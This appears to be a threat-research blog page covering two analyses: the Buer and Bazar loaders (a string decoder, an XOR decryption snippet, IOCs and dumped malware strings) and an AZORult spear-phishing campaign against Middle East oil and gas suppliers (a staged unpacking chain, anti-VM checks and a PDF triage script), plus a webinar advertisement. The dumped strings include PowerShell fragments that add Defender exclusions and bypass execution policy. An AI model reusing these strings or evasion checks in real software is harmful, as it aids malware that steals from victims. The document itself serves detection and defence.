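cross-checked here against the post's own indicators: one string shifts back
to the Buer C&C address given under IOCs. The shift search and the prefix
list are this example's assumptions.
"""

# Obfuscated strings copied from the post's "Buer strings" list.
BUER_STRINGS = [
    "myyux?44659379=3=83684",
    "Lr?jjma_rcTgprs_jKckmpw",
    "JbpEcrNpmacbspc?bbpcqq",
    "LrOscpwTgprs_jKckmpw",
    "LrDpccTgprs_jKckmpw",
    "LrNpmrcarTgprs_jKckmpw",
    "LrPc_bTgprs_jKckmpw",
    "LrEcrAmlrcvrRfpc_b",
    "LrQcrAmlrcvrRfpc_b",
    "akb,cvc",
    "UndefinedTypeError>>1I5480%C9#5=O=B8",  # not a plain shift; stays undecoded
]

# Prefixes a loader's plaintext strings are likely to start with (assumption).
KNOWN_PREFIXES = ("http", "Nt", "Zw", "Ldr", "Rtl", "cmd", "powershell")


def shift(s: str, delta: int) -> str:
    """Add delta to every character code, wrapping within one byte."""
    return "".join(chr((ord(c) + delta) % 256) for c in s)


def guess_shift(s: str, prefixes=KNOWN_PREFIXES, max_shift=32):
    """Try +/-1, +/-2, ... and return (delta, plaintext) for the first
    printable result that starts with a known prefix; None if none does."""
    for magnitude in range(1, max_shift + 1):
        for delta in (magnitude, -magnitude):
            candidate = shift(s, delta)
            if candidate.isprintable() and candidate.startswith(prefixes):
                return delta, candidate
    return None


def decode_all(strings=BUER_STRINGS) -> dict:
    """Map each obfuscated string to (delta, plaintext), or None."""
    return {s: guess_shift(s) for s in strings}


if __name__ == "__main__":
    for obf, result in decode_all().items():
        print(f"{obf:40} -> {result}")
```

Two different shifts (+2 for the API names and cmd.exe, -5 for the URL) come out of the search, which suggests two separately encoded string tables in the sample. Strings that are not plain shifts come back as None; those are the ones the post describes as encrypted and need the loader's own decryption routine rather than a brute-force shift.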
IOCs

MD5
Fa0322fb70610d6e67585588184eda39 (Buer loader)
06f42898d5b2303c0b455d3152ced044 (Bazar loader)
04a20c9f33023439b612935b6901917f (Bazar loader)
951acc18e4f14471f49235327e0c1ccc (Bazar loader)
4bb9a709958a1790a6bc257a9b5cb48e (Bazar loader)
03e699324d06bd3d597994f5df893048 (Bazar backdoor group: t1)

Distribution and document URLs
http://unitedyfl[.]com/print_preview.exe
[.]com/document/u/1/d/e/2PACX-1vTwnIt9tXcgRxaOME9G3yErRp50dGxW1EKoTeIAYZwkMEg4j8fOpU9kP7xMJ6pufKfzsoETJwX5ZMM5/pub
[.]com/document/u/1/d/e/2PACX-1vSE2BfEV4tOmHOpMzeBhWbyajWwjxajBvm1YpJSRWyDL-qXbnSsu-OHhyuT2Y4mbZ72uPT9uToZWvo2/pub
[.]com/document/u/1/d/e/2PACX-1vTCf1OgjnHoaohnZ0BMwCFRU62HyC85BfeiX7NGPiwvrqr8P-_-Y_5Mab9wAJjCIcldWv8wvKVXFuiK/pub
[.]com/document/d/e/2PACX-1vQ4MCpbsYfwekk44caru7p05aOKswFPvyQNsyow1Qfg1exHrGZHaqOmWcnSeAxmDK2V1i3ml9DP8kYT/pub
[.]com/document/d/e/2PACX-1vRl0GvrO4JO8Rs4v1BTtXmsMThv1M413Z14onQl-TkrsXZEOOr1zF8gKu3GDOwFBN0kaw5g7oC7lbIE/pub
[.]com/document/d/e/2PACX-1vR0NwqguWEFX4ZilvsxKSaJQbUfXpfK5fvWxbxUBJfPzbmvGuxHS7bltp9cjpJ0RvrvdlAxeKpSjDKQ/pub

C&C
Buer loader:
104.248.83[.]13
Bazar loader:
164.68.107[.]165
91.235.129[.]64
37.220.6[.]126
195.123.241[.]194
82.146.37[.]128
85.143.221[.]85
164.132.76[.]76
54.37.237[.]253

Some of the URIs seen in this campaign include:
/api/v190 - Download updated Bazar loader (64-bit)
/api/v192 - Download Bazar backdoor (64-bit)
/api/v202 - (Server did not respond with a payload at the time of analysis)
/api/v207 - (Server did not respond with a payload at the time of analysis)

PDB string
c:\Users\Mr.Anderson\Documents\Visual Studio 2008\Projects\Anderson\x64\Release\Anderson.pdb

Some of the subject lines observed
Re: {Target Company Name} termination list
Re: {Target Company Name} avoiding
FW: Urgent: {Target Company Name}: A Customer Complaint Request – Prompt Action Required
RE: FYI: {Target Company Name} Employees Termination List – Confirmation Required
Re: complaint request
Re: my call, {Target Company Name}.
Re: {Target Company Name} - my visit
Re: can't call you

MITRE ATT&CK
ID Technique
T1566.002 Phishing: Spearphishing Link
T1566.003 Phishing: Spearphishing via Service
T1204.001 User Execution: Malicious Link
T1204.002 User Execution: Malicious File
T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
T1055.013 Process Injection: Process Doppelgänging
T1055.012 Process Injection: Process Hollowing
T1027.002 Obfuscated Files or Information: Software Packing
T1140 Deobfuscate/Decode Files or Information
T1036.005 Masquerading: Match Legitimate Name or Location
T1087 Account Discovery
T1010 Application Window Discovery
T1083 File and Directory Discovery
T1057 Process Discovery
T1012 Query Registry
T1018 Remote System Discovery
T1082 System Information Discovery
T1033 System Owner/User Discovery
T1124 System Time Discovery
T1119 Automated Collection
T1005 Data from Local System
T1053.002 Scheduled Task/Job: At (Windows)
T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL
T1071.001 Application Layer Protocol: Web Protocols
T1568.002 Dynamic Resolution: Domain Generation Algorithms
T1020 Automated Exfiltration
T1041 Exfiltration Over C2 Channel

Appendix

Script to decrypt the downloaded Bazar backdoor (repeating-key XOR; written here for Python 3, the original targeted Python 2):

# Note: the key can vary between downloader samples.
key = b"20200915"
data = open("v190", "rb").read()
# XOR each byte with the key byte at the same position modulo the key length.
out = bytes(b ^ key[i % len(key)] for i, b in enumerate(data))
with open("dec1", "wb") as of:
    of.write(out)

Buer strings
Uc3nakqfdpmcFjc powershell.exe -Command "& {Add-MpPreference -ExclusionPath update Kdc23icmQoc21f open .dll rundll32 regsvr32 powershell.exe "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & ' %02x POST Content-Type: application/x-www-form-urlencoded runas %s, "%s" Software\Microsoft\Windows\CurrentVersion\RunOnce {%s-%d-%d} ntdll.dll myyux?44659379=3=83684 myyux?44659379=3=83684
myyux?44659379=3=83684 myyux?44659379=3=83684 myyux?44659379=3=83684 UndefinedTypeError>>1I5480%C9#5=O=B8 hd0OkaN3/Iqc7_Kdh secinit.exe false true null api/update/ api/update/ X4OIvcO7uWS update statusCode AccessToken method x64 exelocal memload memloadex api/download/ api/downloadmodule/ download_and_exec download_and_exec regsrv32 rundll rundllex parameters autorun explorer.exe api/module/ modules loaddllmem Admin User Windows 10 Windows Server 2019/Server 2016 Windows 8.1 Windows Server 2012 R2 Windows 8 Windows Server 2012 Windows 7 Windows Server 2008 R2 Windows XP SQCP]ICW X4OIvcO7uWS Unknown x32 x64 LdrLoadDll RtlCreateUserThread LdrGetProcedureAddress RtlFreeUnicodeString RtlAnsiStringToUnicodeString RtlInitAnsiString Mozilla/5.0 (Apple-iPhone7C2/1202.466; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543 Safari/419.3 X4OIvcO7uWS dllhost.exe dllhost.exe Software\Microsoft\Windows NT\CurrentVersion\Winlogon Shell open akb,cvc %ALLUSERSPROFILE% Ostersin \AutoReg.exe " ensgJJ ensgJJ explorer.exe secinit.exe shell32.dll Winhttp.dll advapi32.dll user32.dll netapi32.dll NtWriteVirtualMemory Lr?jjma_rcTgprs_jKckmpw JbpEcrNpmacbspc?bbpcqq LrOscpwTgprs_jKckmpw LrDpccTgprs_jKckmpw LrNpmrcarTgprs_jKckmpw LrPc_bTgprs_jKckmpw LrEcrAmlrcvrRfpc_b LrQcrAmlrcvrRfpc_b Buer loader API hashes and corresponding API names 0x69f7df2a -> advapi32_GetTokenInformation 0xe79d18d6 -> kernel32_OpenProcessToken 0x47979a8f -> advapi32_GetCurrentHwProfileW 0x19e1e0c2 -> kernel32_RegCreateKeyExW 0xd45f73b5 -> kernel32_RegCloseKey 0xcb5998e2 -> kernel32_RegSetValueExW 0xce636ff5 -> advapi32_GetSidSubAuthority 0xaf7f658e -> winhttp_WinHttpOpen 0x20b4c051 -> winhttp_WinHttpSetTimeouts 0x8ef04f02 -> winhttp_WinHttpCrackUrl 0x9f47a05e -> winhttp_WinHttpConnect 0x1dd1d38d -> winhttp_WinHttpOpenRequest 0x26d17a4e -> winhttp_WinHttpSendRequest 0xb20e6a35 -> winhttp_WinHttpGetIEProxyConfigForCurrentUser 0x1ef97964 -> winhttp_WinHttpGetProxyForUrl 0x8678c3f6 -> 
winhttp_WinHttpSetOption 0xea74138b -> winhttp_WinHttpWriteData 0x80cc5bd7 -> winhttp_WinHttpReadData 0x6c3f3920 -> winhttp_WinHttpReceiveResponse 0xde67ac3c -> winhttp_WinHttpQueryHeaders 0x710832cd -> winhttp_WinHttpQueryDataAvailable 0x9964b3dc -> winhttp_WinHttpCloseHandle 0x302ebe1c -> kernel32_VirtualAlloc 0x4247bc72 -> kernel32_VirtualQuery 0x1803b7e3 -> kernel32_VirtualProtect 0x1a4b89aa -> kernel32_GetCurrentProcess 0x8a8b4676 -> kernel32_LoadLibraryA 0x1acaee7a -> kernel32_GetProcAddress 0x61eebd02 -> kernel32_GetModuleHandleW 0x8a8b468c -> kernel32_LoadLibraryW 0xab489125 -> kernel32_GetNativeSystemInfo 0x34590d2e -> kernel32_GetLastError 0x5b3716c6 -> kernel32_GlobalFree 0xe183277b -> kernel32_VirtualFree 0x62f1df50 -> kernel32_VirtualFreeEx 0xdd78764 -> kernel32_VirtualAllocEx 0xf3cf5f6f -> kernel32_GetModuleFileNameW 0xae7a8bda -> kernel32_CloseHandle 0x29e91ba6 -> kernel32_HeapSize 0xe3802c0b -> kernel32_HeapAlloc 0x864bde7e -> kernel32_GetProcessHeap 0x12dfcc4e -> kernel32_ExitProcess 0x7722b4b -> kernel32_TerminateProcess 0xb4f0f46f -> kernel32_CreateProcessW 0xff5ec2ce -> kernel32_ExitThread 0x4b3e6161 -> kernel32_TerminateThread 0xed619452 -> kernel32_CreateMutexW 0x7bffe25e -> kernel32_OpenMutexW 0xf785ce6 -> kernel32_ReadFile 0xe6886cef -> kernel32_WriteFile 0x1a7f0bab -> kernel32_CreateFileW 0xbdfa937d -> kernel32_GetFileSize 0x617ea42b -> kernel32_DeleteFileW 0x6659de75 -> kernel32_WriteProcessMemory 0xc56e656d -> kernel32_GetCommandLineW 0x78c1ba50 -> kernel32_ExpandEnvironmentStringsW 0x2e0ccb63 -> kernel32_CreateDirectoryW 0x5c62ca81 -> kernel32_WaitForSingleObject 0x8edf8b90 -> kernel32_OpenProcess 0x8a62152f -> kernel32_CreateToolhelp32Snapshot 0xc9112e01 -> kernel32_Process32NextW 0x63f6889c -> kernel32_Process32FirstW 0x4b9358fc -> kernel32_DuplicateHandle 0x24e2968d -> kernel32_GetComputerNameW 0x110e739a -> kernel32_GetVolumeInformationW 0xf7643b99 -> kernel32_GetThreadContext 0x3cc73360 -> kernel32_ResumeThread 0x77643b9b -> 
kernel32_SetThreadContext 0x1c2c653b -> ntdll_memset 0x1c846140 -> ntdll_memcpy 0x932d8a1a -> ntdll_NtDelayExecution 0x9716d04e -> ntdll_NtReleaseMutant 0x6f7f7a64 -> ntdll_RtlGetVersion 0x996cc394 -> ntdll_ZwUnmapViewOfSection 0xabf93436 -> ntdll_strtoul 0x2bd04fd1 -> ntdll_iswctype 0x26a5553c -> ntdll_strstr 0x4117fd0e -> ntdll_NtQueryDefaultLocale 0xd24c9118 -> ntdll_RtlCreateUserThread 0xd52ff865 -> ntdll_NtQueryVirtualMemory 0x339c09fb -> ntdll_NtQueryInformationProcess 0x6a13016e -> ntdll_NtSetInformationThread 0x6debaaa9 -> ntdll_NtFilterToken 0xd584ba6c -> shell32_SHGetFolderPathW 0x375eadf4 -> shell32_CommandLineToArgvW 0xba1eb35b -> shell32_ShellExecuteW 0xf674afe0 -> user32_wsprintfW References Mohd Sadique Join Us Live: Three Secrets to Stopping Ransomware Cold Zscaler will be hosting a webinar covering ransomware's ins and outs and what you can do to keep your organization safe. Learn more and secure your spot here. Ransomware continues to dominate headlines worldwide, with recent estimates surpassing $20 billion of damages in 2020 alone. Today’s adversaries are using a diverse set of methodologies to attack each target and easily bypass legacy security solutions. While ransomware can cause serious damage and disruption to a business’s networks, finances, and reputation, we assure you that it’s not all doom and gloom—if you know the secrets to stopping these attacks. We’ll be discussing all of that at our upcoming virtual event, The Three Secrets to Stopping Ransomware Cold, and I hope you’ll join us. I’ll be joined by Deepen Desai, CISO and VP of Security Research at Zscaler, and Tony Fergusson, our Director of Transformation Strategy. The three of us have spent years analyzing and combating ransomware, and we’ll dive into new techniques attackers are using to avoid detection, trick users, and coerce organizations into paying (it’s not just about losing data anymore). 
We'll also explore the best ways to protect your enterprise from these highly disruptive attacks. The session will cover:

How the latest ransomware campaigns exploit security weaknesses
How ransomware hides inside encrypted traffic to bypass inspection
What it takes to sandbox suspicious files effectively
Why cloud scalability can close security gaps
How a zero trust approach to connectivity eliminates your attack surface

Ransomware isn't going away; it is, however, getting more disruptive, more impactful, and more expensive. Legacy tools do not have the inspection capabilities to keep up with the demands of inspecting all traffic, quarantining threats at scale without performance dips, or delivering the always-on security necessary to defend today's remote workforce. Zscaler, on the other hand, has already helped thousands of customers prevent ransomware and other cyberattacks using the Zscaler Zero Trust Exchange, the world's largest inline security platform built for the cloud.

Live webinar dates and times:
America: Tuesday, September 29, 2020 | 11:00 AM PT | 2:00 PM ET
EMEA: Wednesday, September 30, 2020 | 10:00 AM BST | 11:00 AM CEST
APAC: Wednesday, September 30, 2020 | 10:00 AM IST | 2:30 PM AEST

Register today for one of these sessions. We look forward to seeing you there!

About Bryan Lee
Bryan is a Principal Product Manager at Zscaler, with more than ten years of experience in cybersecurity. His areas of expertise are espionage threats, cybersecurity operations, and threat intelligence.

About Deepen Desai
Deepen is the Zscaler CISO and VP of Security Research at Zscaler ThreatLabZ. Deepen has been actively involved in threat research and analysis for 13 years and is affiliated with various security working groups.

About Tony Fergusson
Tony is the Director of Transformation Strategy at Zscaler and has more than 25 years of experience in IT networking and security across a range of organizations and industries, including manufacturing, information technology, and financial services.

Bryan Lee

Targeted Attacks on Oil and Gas Supply Chain Industries in the Middle East

Cybercriminals are known to draw on current events to make their schemes and campaigns more engaging and relevant to unsuspecting victims. These events need not be global in nature and are often only of local or regional interest, which helps the attackers narrow their targeting in the hope of a greater chance of success. So when the Abu Dhabi National Oil Company (ADNOC) terminates engineering, procurement and construction (EPC) contracts it had previously awarded, attentive cybercriminals have new fodder for another scheme.

Since July 2020, the Zscaler ThreatLabZ team has observed an increase in targeted attacks against multiple supply chain-related organizations in the oil and gas sector in the Middle East. We discovered multiple malicious PDF files, sent as email attachments, that were used to distribute the AZORult information-stealing Trojan to these organizations. In this blog, we describe the details of the campaign: the attack vectors, the malware distribution strategy, and the threat attribution.

Distribution strategy

The attack chain begins with an email that appears to come from an official at ADNOC and is targeted at officials working in the supply chain and government sectors in the Middle East. Each email in this campaign carries an attached PDF file. The first page of the PDF contains download links that lead to legitimate file sharing sites, such as WeTransfer and others, where a ZIP archive is hosted. The ZIP archive contains a malicious, packed .NET executable that decrypts, loads, and executes the embedded AZORult binary.
Figure 1 shows a graphical representation of the attack flow.

Figure 1: The flow of the attack.

Email analysis

Figure 2 shows an email message that pretends to come from a senior chemist in lab operations at ADNOC Sour Gas.

Figure 2: A fake email sent to officials in the supply chain industry in the Middle East.

In all cases, the emails were sent from Gmail addresses; two Gmail addresses were observed across the attacks. The threat actor also used the anonymous email service Tutanota to register further addresses that were used in this campaign.

The PDF files attached to the emails are multipage documents (14 pages) that appear to be Requests for Quotation (RFQs) for supply contracts and legal tenders for various projects related to ADNOC and Doha's airport. The decoy documents are carefully crafted to look legitimate for social engineering purposes. The first page of each document contains instructions to access the specifications and drawings through embedded download links, which lead to the malicious ZIP archives described in the attack flow above. Some examples of the content of the PDFs:

PDF filename: PI-18031 Dalma Gas Development Project (Package B) -TENDER BULLETIN-01.pdf
MD5 hash: e368837a6cc3f6ec5dfae9a71203f2e2

Figure 3 shows a PDF that pretends to be a legitimate RFQ related to the Dalma gas development project. It bears the ADNOC logo at the top right, and the first page contains the malicious download links.

Figure 3: The fake letter contained in the PDF associated with this attack.

PDF filename: AJC-QA HAMAD INTERNATIONAL AIRPORT EXPANSION, DOHA.pdf
MD5 hash: abab000b3162ed6001ed8a11024dd21c

Figure 4 shows a PDF that pretends to be an RFQ for the Hamad International Airport expansion in Doha and supposedly comes from a supply chain trading contractor in Qatar.

Figure 4: The fake RFQ for a local airport expansion project.
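The two things that make these attachments clusterable, the author name in the PDF metadata and the file-sharing links on the first page, can be pulled out without opening the document. The script below is an added example (not ThreatLabZ tooling) that does exactly that: it reads the trailer's Info dictionary, collects every /URI action target, and flags the ones pointing at the staging services listed in the post's IOCs (we.tl, mega.nz, dropbox.com, bit.ly). It parses uncompressed PDF objects with regular expressions, which is enough for the Info dictionary and plain link annotations; links packed into compressed object streams need a PDF library. SAMPLE_PDF is a hand-built one-page file constructed for the demo, not one of the campaign documents.

```python
"""Triage a suspicious PDF attachment: read the Info-dictionary metadata
(author, creator, producer) and every /URI link target, and flag links to the
file-sharing services used to stage the ZIP archives in this campaign.

Added example, not ThreatLabZ tooling. It parses uncompressed PDF objects with
regular expressions, which covers the Info dictionary and plain link
annotations; links packed into compressed object streams need a PDF library.
SAMPLE_PDF is hand-built for the demo and is not one of the campaign files.
"""
import re
from urllib.parse import urlsplit

# Staging hosts taken from the ZIP-hosting URLs in the post's IOC list.
STAGING_HOSTS = ("we.tl", "mega.nz", "dropbox.com", "bit.ly")

# A PDF literal string: parentheses with backslash escapes inside.
PDF_STRING = rb"\(((?:\\.|[^\\)])*)\)"

# Constructed one-page PDF with two link annotations and an Info dictionary
# carrying the author name and Word 2013 producer seen in the campaign.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /Annots [4 0 R 6 0 R] >> endobj
4 0 obj << /Type /Annot /Subtype /Link /A << /S /URI /URI (https://we.tl/t-example) >> >> endobj
5 0 obj << /Author (Donor1) /Creator (Microsoft\\256 Word 2013) /Producer (Microsoft\\256 Word 2013) >> endobj
6 0 obj << /Type /Annot /Subtype /Link /A << /S /URI /URI (https://example.com/spec.html) >> >> endobj
trailer << /Root 1 0 R /Info 5 0 R >>
%%EOF
"""


def _pdf_string(raw: bytes) -> str:
    """Undo PDF string escapes (backslashed characters and octal codes), decode as Latin-1."""
    def unescape(m):
        esc = m.group(1)
        if esc[:1].isdigit():
            return bytes([int(esc, 8) & 0xFF])
        return {b"n": b"\n", b"r": b"\r", b"t": b"\t"}.get(esc, esc)
    return re.sub(rb"\\(\d{1,3}|.)", unescape, raw).decode("latin-1")


def extract_metadata(pdf: bytes) -> dict:
    """Return the string entries of the trailer's Info dictionary."""
    ref = re.search(rb"/Info\s+(\d+)\s+(\d+)\s+R", pdf)
    if not ref:
        return {}
    num, gen = ref.groups()
    obj = re.search(rb"(?<!\d)" + num + rb"\s+" + gen + rb"\s+obj\s*<<(.*?)>>\s*endobj", pdf, re.S)
    if not obj:
        return {}
    return {key.decode(): _pdf_string(val)
            for key, val in re.findall(rb"/(\w+)\s*" + PDF_STRING, obj.group(1))}


def extract_links(pdf: bytes) -> list:
    """Return every /URI action target in document order, without duplicates."""
    links = []
    for raw in re.findall(rb"/URI\s*" + PDF_STRING, pdf):
        uri = _pdf_string(raw)
        if uri not in links:
            links.append(uri)
    return links


def staging_links(uris, hosts=STAGING_HOSTS) -> list:
    """Keep the links whose host is one of the staging services (or a subdomain)."""
    flagged = []
    for uri in uris:
        host = (urlsplit(uri).hostname or "").lower()
        if any(host == h or host.endswith("." + h) for h in hosts):
            flagged.append(uri)
    return flagged


def defang(uri: str) -> str:
    """Rewrite a URL so it cannot be clicked when pasted into a report."""
    return re.sub(r"^http", "hxxp", uri).replace(".", "[.]")


def triage(pdf: bytes) -> dict:
    """One-call summary for an attachment: who made it and where its links go."""
    meta = extract_metadata(pdf)
    links = extract_links(pdf)
    return {
        "author": meta.get("Author"),
        "creator": meta.get("Creator"),
        "producer": meta.get("Producer"),
        "links": links,
        "staging_links": [defang(u) for u in staging_links(links)],
    }


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_PDF
    for k, v in triage(data).items():
        print(f"{k:14} {v}")
```

Run it against a quarantined attachment (python triage.py file.pdf) to get the author for clustering and the defanged staging links for blocking, without rendering the document. The Info dictionary is what the author-name grouping in the Metadata analysis section relies on; bear in mind it is attacker-controlled and trivially editable, so treat matching authors as a pivot for further analysis, not as proof of a shared actor on its own.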
Threat attribution

The threat actor is specifically interested in Middle East targets, such as organisations in the supply chain and government sectors, especially in the United Arab Emirates (UAE) and Qatar. Based on the recipients of the emails, the contents of the emails and the attached PDF files, and the metadata and infrastructure analysis below, we conclude that this is a targeted attack on organisations in the Middle East.

Metadata analysis

By investigating the metadata of the PDF files, we were able to discover several further PDFs that we associate with the same threat actor. This distribution method was used in the wild in low volume from January 2020 through May 2020. Starting in July 2020, we observed the threat actor return with a new campaign and an increase in activity. The metadata indicates that the PDF files were generated with Microsoft Office Word 2013. The only author names used across all the PDF samples were:

Donor1
Mr. Adeel

Figure 5 shows an example of the metadata of the PDF file with the MD5 hash e368837a6cc3f6ec5dfae9a71203f2e2.

Figure 5: The metadata of one of the PDFs used in this campaign.

The complete list of PDF samples identified in this campaign is provided in the Appendix.

Infrastructure analysis

In addition to the contents of the emails and documents used for attribution, the command and control (C&C) infrastructure shows that the threat actor deliberately chose a C&C server that blends in with the theme. At the time of analysis, the C&C domain in the samples we discovered resolved to an IP address that, when the domain was accessed directly, redirected to the website of a service consulting company from Egypt, as shown in Figure 6.

Figure 6: A legitimate Middle East-based site reached through the redirect.

Four further domains redirected to the same site. With a high level of confidence, we conclude that this threat actor is interested in stealing information from, and gaining access to the infrastructure of, supply chain-related organisations in the Middle East.

Technical analysis of the .NET payload

For the technical analysis, we consider the .NET binary with MD5 hash 84e7b5a60cd771173b75a775e0399bc7. This payload, found inside the downloaded ZIP archive, is a packed and obfuscated .NET binary. Static analysis shows that it pretends to be a Skype application, with spoofed metadata, as shown in Figure 7.

Figure 7: Metadata of the main .NET executable.

On execution, it unpacks a second payload embedded in its resource section. Figure 8 shows the custom routine that decrypts that payload using the hardcoded key "GXR20".

Figure 8: The subroutine used to decrypt the second-stage .NET DLL.

Second stage

Figure 9 shows the decrypted payload, a .NET DLL with MD5 hash 0988195ab961071b4aa2d7a8c8e6372d named Aphrodite.dll.

Figure 9: The unpacked and loaded second-stage DLL, Aphrodite.

Execution is transferred to the DLL by creating an object of the class "Mortiz.Anton" with the following three parameters, as shown in Figure 10:

ugz1: "ddLPjs" (name of the bitmap image resource)
ugz3: "KKBxPQsGk" (the decryption key)
projName: "Skype" (project name of the main executable)

Figure 10: Control passed to the Aphrodite DLL.

This DLL in turn unpacks another binary, embedded as a bitmap image in the resource section of the main executable, as shown in Figure 11.

Figure 11: The bitmap image in the resource section that contains the next-stage payload.

Like the second stage (Aphrodite), it is encrypted with a custom algorithm.
The custom algorithm is XOR-based, using the key passed in the parameter ugz3.

Third stage

The resulting unpacked binary is a .NET DLL with MD5 hash ae5f14478d5e06c1b2dc2685cbe992c1, named Jupiter. Control is transferred to the third-stage DLL via a call to one of its routines, as shown in Figure 12.

Figure 12: The unpacked and loaded third-stage DLL, Jupiter.

This third-stage DLL uses various methods to detect a virtualization or analysis environment.

Evasion techniques

Below is a summary of the methods this DLL uses to detect an analysis environment.

Registry checks:
Key HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0, value Identifier: data contains "VBOX", "VMWARE" or "QEMU"
Key HARDWARE\Description\System, value SystemBiosVersion: data contains "VBOX" or "QEMU"
Key HARDWARE\Description\System, value VideoBiosVersion: data contains "VIRTUALBOX"
Presence of the key SOFTWARE\Oracle\VirtualBox Guest Additions or SOFTWARE\VMware, Inc.\VMware Tools
Key HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0, value Identifier: data contains "VMWARE"
Key HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0, value Identifier: data contains "VMWARE"
Key SYSTEM\ControlSet001\Services\Disk\Enum, value 0: data contains "VMWARE"
Key SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000, value DriverDesc: data contains "VMWARE"
Key SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\Settings, value Device Description: data contains "VMWARE"
Key SOFTWARE\VMware, Inc.\VMware Tools, value InstallPath: data contains "C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\"

Wine environment detection: checks whether the export table of kernel32.dll contains wine_get_unix_file_name.

Windows Management Instrumentation (WMI) query-based checks: runs the query "SELECT * FROM Win32_VideoController" and checks the Description property for any of the keywords "VM Additions S3 Trio32/64", "S3 Trio32/64", "VirtualBox Graphics Adapter", "VMware SVGA II" and "VMWARE".

DLL name-based check: looks for a DLL named SbieDll.dll (the Sandboxie hook DLL) in the process address space.

Username-based checks: checks whether the system username contains any of "USER", "SANDBOX", "VIRUS", "MALWARE", "SCHMIDTI" or "CURRENTUSER".

Filename or file path-based checks: checks whether the file path contains "//VIRUS", "SANDBOX", "SAMPLE" or "C:\file.exe".

Window class check: looks for the window class "Afx:400000:0".

Once all of the above environment checks have passed, the AZORult payload (MD5 hash 38360115294c49538ab15b5ec3037a77) is injected into a new instance of the main process using process hollowing. We will not describe the functionality of the AZORult information stealer, as it is already well documented in the public domain. Based on the flow of execution and the anti-analysis techniques used, the packed .NET payload appears to have been built with the CyaX packer. More details about this packer can be found here.

Network communication

The final unpacked payload, AZORult, steals information from the machine and exfiltrates it in an HTTP POST request to a URL on the C&C server. On inspection, we found that directory listing (opendir) was enabled on the C&C server, as shown in Figure 13.

Figure 13: Opendir enabled on the C&C server.

The AZORult panel is also hosted on the C&C server.

Figure 14: The AZORult panel.

PHP mailer script

Among other artifacts on the C&C server, we found a PHP mailer script deployed at hxxp://crevisoft[.]net/images/-/leaf.php. It allows the threat actor to send email through the C&C server's SMTP service.

Figure 15: The PHP mailer script on the C&C server.

Zscaler Cloud Sandbox detection

Figure 16 shows the Zscaler Cloud Sandbox successfully detecting this .NET-based threat.

Figure 16: Zscaler Cloud Sandbox detection.

In addition to sandbox detections, Zscaler's multilayered cloud security platform detects indicators at various levels:

Win32.PWS.Azorult
Win64.PWS.Azorult
PDF.Downloader.Azorult

Conclusion

This threat actor targets employees of supply chain companies in the oil and gas sector in the Middle East. As always, users should be cautious with unexpected emails, even when they appear to relate to something of interest, such as a legal tender for a relevant project. Be wary of links embedded in file formats such as PDF, since those links can lead to the download of malicious files. The Zscaler ThreatLabZ team will continue to monitor this campaign, and others, to help keep our customers safe.

MITRE ATT&CK TTP mapping
ID Technique Notes
T1566.001 Phishing: Spearphishing Attachment. PDF attachments containing malicious URLs.
T1204.002 User Execution: Malicious File. The user opens the PDF, clicks the link, downloads and extracts the ZIP file, and executes the binary.
T1140 Deobfuscate/Decode Files or Information. Strings and other data are obfuscated in the payload.
T1036.005 Masquerading: Match Legitimate Name or Location. File names relate to projects in the Middle East.
T1027.002 Obfuscated Files or Information: Software Packing. Payloads are packed with a multilayer packer.
T1497 Virtualization/Sandbox Evasion. Registry-, WMI- and username-based anti-VM techniques.
T1134.002 Access Token Manipulation: Create Process with Token. AZORult capability.
T1555.003 Credentials from Password Stores: Credentials from Web Browsers. AZORult capability.
T1140 Deobfuscate/Decode Files or Information. AZORult capability.
T1573.001 Encrypted Channel: Symmetric Cryptography. AZORult capability.
T1083 File and Directory Discovery. AZORult capability.
T1070.004 Indicator Removal on Host: File Deletion. AZORult capability.
T1105 Ingress Tool Transfer. AZORult capability.
T1057 Process Discovery. AZORult capability.
T1055.012 Process Injection: Process Hollowing. AZORult capability.
T1012 Query Registry. AZORult capability.
T1113 Screen Capture. AZORult capability.
T1082 System Information Discovery. AZORult capability.
T1016 System Network Configuration Discovery. AZORult capability.
T1033 System Owner/User Discovery. AZORult capability.
T1124 System Time Discovery. AZORult capability.
T1552.001 Unsecured Credentials: Credentials In Files. AZORult capability.

Indicators of compromise

Scheduled task names (naming convention: Updates\<random_string>)
Updates\YJSlNpkH
Updates\WWOsRUUn
Updates\NcojkRtJmDPru

XML file names
Scheduled tasks are created from XML files dropped with random names in the %temp% directory:
C:\Users\user\AppData\Local\Temp\tmp9AA2.tmp
C:\Users\user\AppData\Local\Temp\tmp23B7.tmp
C:\Users\user\AppData\Local\Temp\tmp24CC.tmp

Dropped filenames
Files are dropped in the AppData\Roaming directory with the same name as the scheduled task.
